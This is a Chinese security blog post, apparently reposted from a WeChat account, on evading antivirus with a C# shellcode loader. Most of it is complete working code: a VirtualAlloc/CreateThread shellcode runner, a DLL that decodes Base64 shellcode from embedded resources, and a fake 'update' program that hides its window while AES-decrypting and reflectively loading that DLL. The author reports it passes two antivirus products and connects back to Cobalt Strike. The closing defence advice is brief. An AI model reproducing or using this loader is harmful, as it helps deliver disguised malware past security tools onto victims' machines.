.NET简单分离免杀加载Shellcode

admin

138635
文章

114
评论

2023年3月9日08:21:51评论36 views字数 5729阅读19分5秒阅读模式

STATEMENT

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，雷神众测及文章作者不为此承担任何责任。

传统C#加载Shellcode

using System;using System.Collections.Generic;using System.Linq;using System.Runtime.InteropServices;using System.Text;
namespace TestShellCode{    internal class Program    {        static void Main(string[] args)        {            byte[] shellcode = {shellcode};            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);            IntPtr hThread = IntPtr.Zero;            UInt32 threadId = 0;            IntPtr pinfo = IntPtr.Zero;            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);            WaitForSingleObject(hThread, 0xFFFFFFFF);        }
        private static UInt32 MEM_COMMIT = 0x1000;        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;        [DllImport("kernel32")]        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);        [DllImport("kernel32")]        private static extern bool VirtualFree(IntPtr lpAddress,        UInt32 dwSize, UInt32 dwFreeType);        [DllImport("kernel32")]        private static extern IntPtr CreateThread(        UInt32 lpThreadAttributes,        UInt32 dwStackSize,        UInt32 lpStartAddress,        IntPtr param,        UInt32 dwCreationFlags,        ref UInt32 lpThreadId);        [DllImport("kernel32")]        private static extern bool CloseHandle(IntPtr handle);        [DllImport("kernel32")]        private static extern UInt32 WaitForSingleObject(        IntPtr hHandle,        UInt32 dwMilliseconds);        [DllImport("kernel32")]        private static extern IntPtr GetModuleHandle(        string moduleName);        [DllImport("kernel32")]        private static extern UInt32 GetProcAddress(        IntPtr hModule,        string procName);        [DllImport("kernel32")]        private static extern UInt32 LoadLibrary(        string lpFileName);        [DllImport("kernel32")]        private static extern UInt32 GetLastError();

    }
}

这里我们shellcode生成的32位的，所以.net编译也选择编译生成x86的exe，编译完成，可以cs正常上线。
杀毒测试，两款杀毒软件都报毒。

.NET简单分离免杀加载Shellcode

免杀思路

1、简单免杀
将shellcode采用aes、base64等方式进行加密。
2、分离shell
将shellcode进行aes、base64等方式编码和加密后在存放到资源文件中，程序运行后从资源文件中加载shellcode。
3、分离shellcode加载器
将shellcode进行aes、base64等方式编码和加密后在存放到资源文件中，程序运行后从资源文件中加载shellcode，同时将此功能封装为dll程序。
4、采取类似冰蝎动态Assembly加载方式加载dll程序

免杀操作

1、创建shellcode加载器，生成dll。

首先将shell进行Base64编码存放在资源文件config.txt文件中。注意此资源文件可放在外部exe加载器中（namespace需要一致）。

using System;using System.Collections.Generic;using System.Linq;using System.Reflection;using System.Resources;using System.Runtime.InteropServices;using System.Text;using System.Threading;
namespace bypass360{    public class Loader    {        public override bool Equals(object obj)        {            Thread t = new Thread(test);            t.Start();            return true;
        }        public void test()        {
            Assembly myAssem = Assembly.GetEntryAssembly();            ResourceManager rm = new ResourceManager("bypass360.Properties.Resources", myAssem);//资源文件中读取shellcode加载            string config = rm.GetString("config32");            byte[] shellcode = Convert.FromBase64String(config);            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);            IntPtr hThread = IntPtr.Zero;            UInt32 threadId = 0;            IntPtr pinfo = IntPtr.Zero;            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);            WaitForSingleObject(hThread, 0xFFFFFFFF);        }
        private static UInt32 MEM_COMMIT = 0x1000;        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;        [DllImport("kernel32")]        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);        [DllImport("kernel32")]        private static extern bool VirtualFree(IntPtr lpAddress,        UInt32 dwSize, UInt32 dwFreeType);        [DllImport("kernel32")]        private static extern IntPtr CreateThread(        UInt32 lpThreadAttributes,        UInt32 dwStackSize,        UInt32 lpStartAddress,        IntPtr param,        UInt32 dwCreationFlags,        ref UInt32 lpThreadId);        [DllImport("kernel32")]        private static extern bool CloseHandle(IntPtr handle);        [DllImport("kernel32")]        private static extern UInt32 WaitForSingleObject(        IntPtr hHandle,        UInt32 dwMilliseconds);        [DllImport("kernel32")]        private static extern IntPtr GetModuleHandle(        string moduleName);        [DllImport("kernel32")]        private static extern UInt32 GetProcAddress(        IntPtr hModule,        string procName);        [DllImport("kernel32")]        private static extern UInt32 LoadLibrary(        string lpFileName);        [DllImport("kernel32")]        private static extern UInt32 GetLastError();
    }}

.NET简单分离免杀加载Shellcode

编译完成shellcode加载器，一个已经过了，另一个还是报毒。

.NET简单分离免杀加载Shellcode

继续分离动态加载，将Loader加载器aes加密生成Base64编码的文件，存放在资源文件中。

创建一个外部加载器，这里我模拟的是一个更新程序，创建了一个winform项目，一个进度条自动加载几秒后隐藏窗体，同时后台冰蝎动态Assembly加

载方式从资源文件中加载加密好的Loader的dll程序，并实例化对应的加载器类，调用Equals加载shellcode。

using System;using System.Windows.Forms;using System.Runtime.InteropServices;using System.Resources;using System.Reflection;using System.Threading;using System.IO;using System.Security.Cryptography;using System.Text;
namespace bypass360{    public partial class Form1 : Form    {        public Form1()        {            InitializeComponent();        }        private void Form1_Shown(object sender, EventArgs e)        {            this.timer1.Start();            test();
         }        public void test()        {            //从资源文件中读取加密shellcode Loader，加载shellcode            Assembly myAssem = Assembly.GetEntryAssembly();            ResourceManager rm = new ResourceManager("bypass360.Properties.Resources", myAssem);            string config = rm.GetString("dll32");            //Base64解码            byte[] data = Convert.FromBase64String(config);            //Aes解密还原程序集            byte[] key = Encoding.Default.GetBytes("1234567887654321");            byte[] cdata = new RijndaelManaged().CreateDecryptor(key, key).TransformFinalBlock(data, 0, data.Length);            //Assembly动态加载程序集并实例化加载器调用Equals方法执行Shellcode            Assembly assembly = typeof(Environment).Assembly;            Assembly.Load(cdata).CreateInstance("bypass360.Loader").Equals("");
        }
        private void button1_Click(object sender, EventArgs e)        {            this.Hide();        }        int p = 0;        private void timer1_Tick(object sender, EventArgs e)        {            p++;            if (p >= 3) {                this.Hide();            }        }    }
}

由于这里shellcode是32位所以Loader dll和当前的exe加载器我们都编译成x86，32位程序，如果是64位shellcode就全编译为64位程序。

编译后测试，两款杀毒软件均未检出。

.NET简单分离免杀加载Shellcode

运行测试，成功上线，无拦截：

.NET简单分离免杀加载Shellcode

不完美的事，就是在webshell下面执行时，360主动防护对于后台进程执行程序管理较为严格，只能采取其他措施在webshell下运行了。

.NET简单分离免杀加载Shellcode

防御方式

1、建议杀毒软件更新检测机制，对关键函数执行加强检测。

2、对于用户来说，不能抱着部署了杀软软件就“万无一失”的心态开展防护工作，还是要通过APT、WAF、日志分析等其他综合手段开展防护工作

安恒信息

✦

杭州亚运会网络安全服务官方合作伙伴

成都大运会网络信息安全类官方赞助商

武汉军运会、北京一带一路峰会

青岛上合峰会、上海进博会

厦门金砖峰会、G20杭州峰会

支撑单位北京奥运会等近百场国家级

重大活动网络安保支撑单位

END

长按识别二维码关注我们

原文始发于微信公众号（雷神众测）：.NET简单分离免杀加载Shellcode

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

.NET简单分离免杀加载Shellcode

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

Webshell免杀思路-PHP篇-1：经典混淆的艺术

CimFS：内存崩溃，查找系统（内核版）

Astral-PE 是用于本机 Windows PE 文件（x32/x64）的低级变异器（Headers/EP 混淆器）

【通俗易懂说AI】MCP如何安装以及使用

深入解析 URL 跳转漏洞：审计方法与渗透实战全攻略

记一次前端js加解密泄露引发的漏洞

一文吃透文件上传漏洞！路径遍历、后缀绕过、ZIP炸弹全解析

发表评论

在线咨询

微信